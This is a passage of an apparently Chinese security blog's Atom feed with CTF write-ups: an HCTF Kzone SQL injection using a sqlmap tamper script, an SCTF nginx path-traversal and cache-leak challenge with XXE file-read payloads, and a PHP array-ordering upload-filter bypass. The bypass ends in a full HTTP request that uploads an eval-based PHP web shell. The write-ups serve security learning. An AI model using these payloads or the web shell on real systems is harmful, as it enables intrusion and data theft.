class="line"> payload = payload.replace(<span class="string">'<'</span>, <span class="string">'\u003c'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'-'</span>, <span class="string">'\u002d'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'='</span>, <span class="string">'\u003d'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'f1a9'</span>, <span class="string">'F1a9'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'f1'</span>, <span class="string">'F1'</span>)</span><br><span class="line"> <span class="keyword">return</span> data % payload</span><br></pre></td></tr></table></figure><p>python .\sqlmap.py -r test.txt –tamper hctf -o –dbms mysql -D hctf_kouzone -T F1444g -C F1a9 –dump</p><p>得到flag:<code>hctf{hctf_2018_kzone_Author_Li4n0}</code></p>]]></content>
<summary type="html">
<h1 id="Kzone"><a href="#Kzone" class="headerlink" title="Kzone"></a>Kzone</h1><p>随手一测发现备份文件泄露,www.zip,下载后代码审计。</p>
<p>看到有后台</p>
<p>查看login.php的源码:/www/admin</p>
<p>发现引入了配置文件../include/common.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">header(<span class="string">'Content-Type: text/html; charset=UTF-8'</span>);</span><br><span class="line">define(<span class="string">'IN_CRONLITE'</span>, <span class="keyword">true</span>);</span><br><span class="line">define(<span class="string">'ROOT'</span>, dirname(<span class="keyword">__FILE__</span>).<span class="string">'/'</span>);</span><br><span class="line">define(<span class="string">'LOGIN_KEY'</span>, <span class="string">'abchdbb679546'</span>);</span><br><span class="line">date_default_timezone_set(<span class="string">"PRC"</span>);</span><br><span class="line">$date = date(<span class="string">"Y-m-d H:i:s"</span>);</span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> ROOT.<span class="string">'../config.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($port))$port=<span class="string">'3306'</span>;</span><br><span class="line"><span class="keyword">include_once</span>(ROOT.<span class="string">"db.class.php"</span>);</span><br><span class="line">$DB=<span class="keyword">new</span> DB($host,$user,$pwd,$dbname,$port);</span><br><span class="line"></span><br><span class="line">$password_hash=<span class="string">'!@#%!s!'</span>;</span><br><span class="line"><span class="keyword">require_once</span> <span class="string">"safe.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"function.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"member.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"os.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"kill.intercept.php"</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</summary>
</entry>
<entry>
<title>SCTF2018-nginx的秘密wp</title>
<link href="http://fdrag0n.github.io/2018/09/13/SCTF2018-nginx%E7%9A%84%E7%A7%98%E5%AF%86wp/"/>
<id>http://fdrag0n.github.io/2018/09/13/SCTF2018-nginx的秘密wp/</id>
<published>2018-09-13T14:19:24.000Z</published>
<updated>2019-12-05T13:20:08.088Z</updated>
<content type="html"><![CDATA[<h1 id="NGINX的秘密"><a href="#NGINX的秘密" class="headerlink" title="NGINX的秘密"></a>NGINX的秘密</h1><p>NGINX配置问题导致任意文件读取 /static../etc/nginx/nginx.conf,</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line">user www-data;</span><br><span class="line">worker_processes auto;</span><br><span class="line">pid /run/nginx.pid;</span><br><span class="line"></span><br><span class="line">events {</span><br><span class="line">worker_connections 768;</span><br><span class="line"># multi_accept on;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">http {</span><br><span class="line"></span><br><span class="line">##</span><br><span class="line"># Basic Settings</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">sendfile on;</span><br><span class="line">tcp_nopush on;</span><br><span class="line">tcp_nodelay on;</span><br><span class="line">keepalive_timeout 65;</span><br><span class="line">types_hash_max_size 2048;</span><br><span class="line"># server_tokens off;</span><br><span class="line"></span><br><span class="line"># server_names_hash_bucket_size 64;</span><br><span class="line"># server_name_in_redirect off;</span><br><span class="line"></span><br><span class="line">include /etc/nginx/mime.types;</span><br><span class="line">default_type application/octet-stream;</span><br><span class="line"></span><br><span class="line">##</span><br><span class="line"># SSL Settings</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE</span><br><span class="line">ssl_prefer_server_ciphers on;</span><br><span class="line"></span><br><span class="line">##</span><br><span class="line"># Logging Settings</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">#access_log /var/log/nginx/access.log;</span><br><span class="line">#error_log /var/log/nginx/error.log;</span><br><span class="line"></span><br><span class="line">##</span><br><span class="line"># Gzip Settings</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">gzip on;</span><br><span class="line">gzip_disable "msie6";</span><br><span class="line"></span><br><span class="line"># gzip_vary on;</span><br><span class="line"># gzip_proxied any;</span><br><span class="line"># gzip_comp_level 6;</span><br><span class="line"># gzip_buffers 16 8k;</span><br><span class="line"># gzip_http_version 1.1;</span><br><span class="line"># gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;</span><br><span class="line"></span><br><span class="line">proxy_cache_path /tmp/mycache levels=1:2 keys_zone=my_cache:10m max_size=10g inactive=30s use_temp_path=off;</span><br><span class="line"></span><br><span class="line">limit_conn_zone $binary_remote_addr zone=conn:10m;</span><br><span class="line">limit_req_zone $binary_remote_addr zone=allips:10m rate=2r/s;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">server {</span><br><span class="line"> listen 4455 default_server;</span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> location /static {</span><br><span class="line"> alias /home/;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location ~* \.(css|js|gif|png){</span><br><span class="line"> proxy_cache my_cache;</span><br><span class="line"> proxy_cache_valid 200 30s;</span><br><span class="line"> proxy_pass http://bugweb.app:8000;</span><br><span class="line"> proxy_set_header Host $host:$server_port;</span><br><span class="line"> proxy_ignore_headers Expires Cache-Control Set-Cookie;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location / {</span><br><span class="line"> limit_conn conn 10;</span><br><span class="line"> proxy_pass http://bugweb.app:8000;</span><br><span class="line"> proxy_set_header Host $host:$server_port;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">##</span><br><span class="line"># Virtual Host Configs</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">include /etc/nginx/conf.d/*.conf;</span><br><span class="line">include /etc/nginx/sites-enabled/*;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#mail {</span><br><span class="line">## See sample authentication script at:</span><br><span class="line">## http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript</span><br><span class="line"># </span><br><span class="line">## auth_http localhost/auth.php;</span><br><span class="line">## pop3_capabilities "TOP" "USER";</span><br><span class="line">## imap_capabilities "IMAP4rev1" "UIDPLUS";</span><br><span class="line"># </span><br><span class="line">#server {</span><br><span class="line">#listen localhost:110;</span><br><span class="line">#protocol pop3;</span><br><span class="line">#proxy on;</span><br><span class="line">#}</span><br><span class="line"># </span><br><span class="line">#server {</span><br><span class="line">#listen localhost:143;</span><br><span class="line">#protocol imap;</span><br><span class="line">#proxy on;</span><br><span class="line">#}</span><br><span class="line">#}</span><br></pre></td></tr></table></figure><p>可以看到开启了缓存,会把css|js|gif|png这四种文件类型缓存。<br><a id="more"></a><br>查看文档<a href="http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path" target="_blank" rel="noopener">http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path</a> </p><p>由proxy_cache_path得知缓存文件保存在/tmp/mycache,用于定义缓存文件名的proxy_cache_key未设置,则使用默认值 $scheme$proxy_host$request_uri,即文件名形式为md5($scheme$proxy_host$request_uri),由于proxy_cache_path设置了levels=1:2,因此缓存文件存在/tmp/mycache下的两级目录下,第一级目录名取MD5值的最后一个字符,第二级目录名取MD5值的倒数2、3个字符.</p><p>又根据提示得知路由规则很奇怪:访问/editxxxxx等同于访问/edit,同理访问/write_plan/a.js等同于访问/write_plan.</p><p>因而构造<a href="http://149.129.103.103:4455/write_plan/a.js/" target="_blank" rel="noopener">http://149.129.103.103:4455/write_plan/a.js/</a> 提交给管理员访问</p><p>机器人挂了还得手动😂</p><p>得到路径为这里是个坑</p><p>不是md5(<a href="http://149.129.103.103:4455/write_plan/a.js/" target="_blank" rel="noopener">http://149.129.103.103:4455/write_plan/a.js/</a>)</p><p>而是<strong>md5(<a href="http://bugweb.app:8000/write_plan/a.js/" target="_blank" rel="noopener">http://bugweb.app:8000/write_plan/a.js/</a>) </strong>== 6fcfa7b1e6bad837b70dc98c9b82b43b</p><p>所以应该访问路径为<a href="http://149.129.103.103:4455/static../tmp/mycache/b/43/6fcfa7b1e6bad837b70dc98c9b82b43b" target="_blank" rel="noopener">http://149.129.103.103:4455/static../tmp/mycache/b/43/6fcfa7b1e6bad837b70dc98c9b82b43b</a></p><p>可以看到ftp用户名与密码syc10ver Eec5TN9fruOOTp2G.</p><p>然后利用xxe执行arp命令</p><figure class="highlight plain"><figcaption><span>version</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><?xml version="1.0" encoding="UTF-8"?></span><br><span class="line"><!DOCTYPE person [<!ENTITY remote SYSTEM</span><br><span class="line">"file:///proc/net/arp">]></span><br><span class="line"><plans></span><br><span class="line"><plan></span><br><span class="line"><content>&remote;</content></span><br><span class="line"></plan></span><br><span class="line"></plans></span><br></pre></td></tr></table></figure><p>得到3个ip</p><ul><li>a few seconds ago 172.19.0.1 0x1 0x2 02:42:ec:2a:71:fb * eth0</li><li>a few seconds ago</li><li>a few seconds ago 172.19.0.4 0x1 0x2 02:42:ac:13:00:04 * eth0</li><li>a few seconds ago</li><li>a few seconds ago 172.19.0.2 0x1 0x2 02:42:ac:13:00:02 * eth0</li></ul><p>然后利用ftp读文件</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><?xml version="1.0" encoding="UTF-8"?></span><br><span class="line"><!DOCTYPE person [<!ENTITY remote SYSTEM</span><br><span class="line">"ftp://syc10ver:[email protected]/flag327a6c4304ad5938eaf0efb6cc3e53dc">]></span><br><span class="line"><plans></span><br><span class="line"><plan></span><br><span class="line"><content>payload &remote;</content></span><br><span class="line"></plan></span><br><span class="line"></plans></span><br></pre></td></tr></table></figure><p>sctf{Not_0n1y_xx3_but_als0_web_cache}</p>]]></content>
<summary type="html">
<h1 id="NGINX的秘密"><a href="#NGINX的秘密" class="headerlink" title="NGINX的秘密"></a>NGINX的秘密</h1><p>NGINX配置问题导致任意文件读取 /static../etc/nginx/nginx.conf,</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line">user www-data;</span><br><span class="line">worker_processes auto;</span><br><span class="line">pid /run/nginx.pid;</span><br><span class="line"></span><br><span class="line">events &#123;</span><br><span class="line"> worker_connections 768;</span><br><span class="line"> # multi_accept on;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">http &#123;</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # Basic Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> sendfile on;</span><br><span class="line"> tcp_nopush on;</span><br><span class="line"> tcp_nodelay on;</span><br><span class="line"> keepalive_timeout 65;</span><br><span class="line"> types_hash_max_size 2048;</span><br><span class="line"> # server_tokens off;</span><br><span class="line"></span><br><span class="line"> # server_names_hash_bucket_size 64;</span><br><span class="line"> # server_name_in_redirect off;</span><br><span class="line"></span><br><span class="line"> include /etc/nginx/mime.types;</span><br><span class="line"> default_type application/octet-stream;</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # SSL Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE</span><br><span class="line"> ssl_prefer_server_ciphers on;</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # Logging Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> #access_log /var/log/nginx/access.log;</span><br><span class="line"> #error_log /var/log/nginx/error.log;</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # Gzip Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> gzip on;</span><br><span class="line"> gzip_disable &quot;msie6&quot;;</span><br><span class="line"></span><br><span class="line"> # gzip_vary on;</span><br><span class="line"> # gzip_proxied any;</span><br><span class="line"> # gzip_comp_level 6;</span><br><span class="line"> # gzip_buffers 16 8k;</span><br><span class="line"> # gzip_http_version 1.1;</span><br><span class="line"> # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;</span><br><span class="line"></span><br><span class="line"> proxy_cache_path /tmp/mycache levels=1:2 keys_zone=my_cache:10m max_size=10g inactive=30s use_temp_path=off;</span><br><span class="line"> </span><br><span class="line"> limit_conn_zone $binary_remote_addr zone=conn:10m;</span><br><span class="line"> limit_req_zone $binary_remote_addr zone=allips:10m rate=2r/s;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"> server &#123;</span><br><span class="line"> listen 4455 default_server;</span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> location /static &#123;</span><br><span class="line"> alias /home/;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> location ~* \.(css|js|gif|png)&#123;</span><br><span class="line"> proxy_cache my_cache;</span><br><span class="line"> proxy_cache_valid 200 30s;</span><br><span class="line"> proxy_pass http://bugweb.app:8000;</span><br><span class="line"> proxy_set_header Host $host:$server_port;</span><br><span class="line"> proxy_ignore_headers Expires Cache-Control Set-Cookie;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> location / &#123;</span><br><span class="line"> limit_conn conn 10;</span><br><span class="line"> proxy_pass http://bugweb.app:8000;</span><br><span class="line"> proxy_set_header Host $host:$server_port;</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> ##</span><br><span class="line"> # Virtual Host Configs</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> include /etc/nginx/conf.d/*.conf;</span><br><span class="line"> include /etc/nginx/sites-enabled/*;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#mail &#123;</span><br><span class="line"># # See sample authentication script at:</span><br><span class="line"># # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript</span><br><span class="line"># </span><br><span class="line"># # auth_http localhost/auth.php;</span><br><span class="line"># # pop3_capabilities &quot;TOP&quot; &quot;USER&quot;;</span><br><span class="line"># # imap_capabilities &quot;IMAP4rev1&quot; &quot;UIDPLUS&quot;;</span><br><span class="line"># </span><br><span class="line"># server &#123;</span><br><span class="line"># listen localhost:110;</span><br><span class="line"># protocol pop3;</span><br><span class="line"># proxy on;</span><br><span class="line"># &#125;</span><br><span class="line"># </span><br><span class="line"># server &#123;</span><br><span class="line"># listen localhost:143;</span><br><span class="line"># protocol imap;</span><br><span class="line"># proxy on;</span><br><span class="line"># &#125;</span><br><span class="line">#&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到开启了缓存,会把css|js|gif|png这四种文件类型缓存。<br>
</summary>
</entry>
<entry>
<title>PHP数组与c数组差异而引发的安全问题</title>
<link href="http://fdrag0n.github.io/2018/08/24/PHP%E6%95%B0%E7%BB%84%E4%B8%8Ec%E6%95%B0%E7%BB%84%E5%B7%AE%E5%BC%82%E8%80%8C%E5%BC%95%E5%8F%91%E7%9A%84%E9%97%AE%E9%A2%98/"/>
<id>http://fdrag0n.github.io/2018/08/24/PHP数组与c数组差异而引发的问题/</id>
<published>2018-08-24T14:19:24.000Z</published>
<updated>2019-08-19T03:00:15.638Z</updated>
<content type="html"><![CDATA[<h1 id="C语言数组"><a href="#C语言数组" class="headerlink" title="C语言数组"></a>C语言数组</h1><p><strong>C语言的数组都是由连续的内存位置组成。最低的地址对应第一个元素,最高的地址对应最后一个元素。</strong></p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105154.jpg" alt=""></p><p>设有一个数组</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">int array[2];</span><br></pre></td></tr></table></figure><p>无论是先给<code>array[0]</code>赋值,还是先给<code>array[1]</code>赋值,其在内存中的排序都是<code>array[0]</code>在前面<code>array[1]</code>在后面,所以无论是用指针指向array的最后一个单元还是直接引用<code>array[1]</code>的值,其所指的都是同一个值。</p><a id="more"></a><h1 id="PHP的数组"><a href="#PHP的数组" class="headerlink" title="PHP的数组"></a>PHP的数组</h1><p><strong>而PHP数组与C语言数组不一样,PHP 中的数组实际上是一个有序映射。映射是一种把 values 关联到 keys 的类型。此类型在很多方面做了优化,因此可以把它当成真正的数组,或列表(向量),散列表(是映射的一种实现),字典,集合,栈,队列以及更多可能性。由于数组元素的值也可以是另一个数组,树形结构和多维数组也是允许的。</strong><br>贴上一个简易的上传过滤源码</p><pre><code><?php $file = $_GET['file']; if (!is_array($file)) { $file = explode('.', strtolower($file)); } print_r ($file); echo '</br>'; $ext = end($file); if (!in_array($ext, ['jpg', 'png', 'gif'])) { print('This file is not allowed!</br>'); } else print('success!</br>'); var_dump($file); echo '</br>'; $filename = reset($file) . '.' . $file[count($file) - 1]; echo 'filename:'.$filename; echo '</br>'; echo 'end($file):'.end($file);?></code></pre><p>如图<code>file[0]</code>和<code>file[1]</code>都是由get传参,如果先给<code>file[0]</code>赋值png,再给<code>file[1]</code>赋值php的话,会被拦截。</p><pre><code>file[0]=png&file[1]=php</code></pre><p>但是如果先给<code>file[1]</code>赋值php,再给<code>file[0]</code>赋值png的话,则可以成功绕过过滤规则上传。</p><pre><code>file[1]=php&file[0]=png</code></pre><p>演示截图:</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105132.PNG" alt=""></p><p>代码第六行和第十二行将其显示出来,由图右侧可见,如果先给<code>file[0]</code>赋值png,再给<code>file[1]</code>赋值php的话,数组是<code>Array ( [0] => png [1] => php )</code>,会被拦截。</p><p>而如果先给<code>file[1]</code>赋值php,再给<code>file[0]</code>赋值png的话,数组就是<code>Array ( [1] => php [0] => png )</code> ,它所占内存区域中最后一个单元是<code>file[0]=>png</code>,而<strong>不像</strong>C语言一样是file[1],所以如果过滤代码一方面用<code>end()</code>来取出数组最后一个单元,而另外一处却用<code>$file[count($file) - 1]</code>来取出最后一个单元,就会存在有绕过的漏洞。</p><h1 id="拿python来比较一下更好说明"><a href="#拿python来比较一下更好说明" class="headerlink" title="拿python来比较一下更好说明"></a>拿python来比较一下更好说明</h1><ul><li>C语言的数组更像Python 列表(List)</li><li>而PHP的数组像Python 字典(Dictionary)</li></ul><h1 id="涉及到的CTF:-网鼎杯第二场的上传题–wafUpload"><a href="#涉及到的CTF:-网鼎杯第二场的上传题–wafUpload" class="headerlink" title="涉及到的CTF: 网鼎杯第二场的上传题–wafUpload"></a>涉及到的CTF: 网鼎杯第二场的上传题–wafUpload</h1><pre><code><?php$sandbox = '/var/www/html/upload/' . md5("phpIsBest" . $_SERVER['REMOTE_ADDR']);@mkdir($sandbox);@chdir($sandbox);if (!empty($_FILES['file'])) {#mime checkif (!in_array($_FILES['file']['type'], ['image/jpeg', 'image/png', 'image/gif'])) {die('This type is not allowed!');}#check filename$file = empty($_POST['filename']) ? $_FILES['file']['name'] : $_POST['filename'];if (!is_array($file)) {$file = explode('.', strtolower($file));}$ext = end($file);if (!in_array($ext, ['jpg', 'png', 'gif'])) {die('This file is not allowed!');}$filename = reset($file) . '.' . $file[count($file) - 1];if (move_uploaded_file($_FILES['file']['tmp_name'], $sandbox . '/' . $filename)) {echo 'Success!';echo 'filepath:' . $sandbox . '/' . $filename;} else {echo 'Failed!';}}show_source(__file__);?></code></pre><ul><li>第8-10行mime check部分 MIME 类型检测,使用图片马绕过。</li><li>第12-20行check filename部分 对文件后缀进行了检测,而后缀名则是取 <code>$file</code> 数组中最后一个元素。然后在生成文件的时候,文件名取<code>$file</code> 数组的最后一个元素做后缀,这明显存在绕过。我们只要控制<code>$file</code>数组中参数的即可绕过并 getshell ,请求数据包如下</li></ul><pre><code>POST / HTTP/1.1Host: 4b590ee044fe8fb3a180712f8407e4136069037e.game.ichunqiu.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://4b590ee044fe8fb3a180712f8407e4136069037e.game.ichunqiu.com/Content-Type: multipart/form-data; boundary=---------------------------9930139772306Content-Length: 524DNT: 1Connection: closeUpgrade-Insecure-Requests: 1-----------------------------9930139772123Content-Disposition: form-data; name="filename[1]"php-----------------------------9930139772123Content-Disposition: form-data; name="filename[0]"png-----------------------------9930139772123Content-Disposition: form-data; name="file"; filename="fdrag0n.jpg"Content-Type: image/jpeg<?php @eval($_POST['a']);?>-----------------------------9930139772123Content-Disposition: form-data; name="submit"Submit-----------------------------9930139772123--</code></pre>]]></content>
<summary type="html">
<h1 id="C语言数组"><a href="#C语言数组" class="headerlink" title="C语言数组"></a>C语言数组</h1><p><strong>C语言的数组都是由连续的内存位置组成。最低的地址对应第一个元素,最高的地址对应最后一个元素。</strong></p>
<p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105154.jpg" alt=""></p>
<p>设有一个数组</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">int array[2];</span><br></pre></td></tr></table></figure>
<p>无论是先给<code>array[0]</code>赋值,还是先给<code>array[1]</code>赋值,其在内存中的排序都是<code>array[0]</code>在前面<code>array[1]</code>在后面,所以无论是用指针指向array的最后一个单元还是直接引用<code>array[1]</code>的值,其所指的都是同一个值。</p>
</summary>
</entry>
<entry>
<title>利用autorun.inf预防自动运行病毒及个性化磁盘图标</title>
<link href="http://fdrag0n.github.io/2018/08/13/%E5%88%A9%E7%94%A8autorun-inf%E9%A2%84%E9%98%B2%E8%87%AA%E5%8A%A8%E8%BF%90%E8%A1%8C%E7%97%85%E6%AF%92%E5%8F%8A%E4%B8%AA%E6%80%A7%E5%8C%96%E7%A3%81%E7%9B%98%E5%9B%BE%E6%A0%87/"/>
<id>http://fdrag0n.github.io/2018/08/13/利用autorun-inf预防自动运行病毒及个性化磁盘图标/</id>
<published>2018-08-13T02:37:01.000Z</published>
<updated>2019-08-19T03:00:22.667Z</updated>
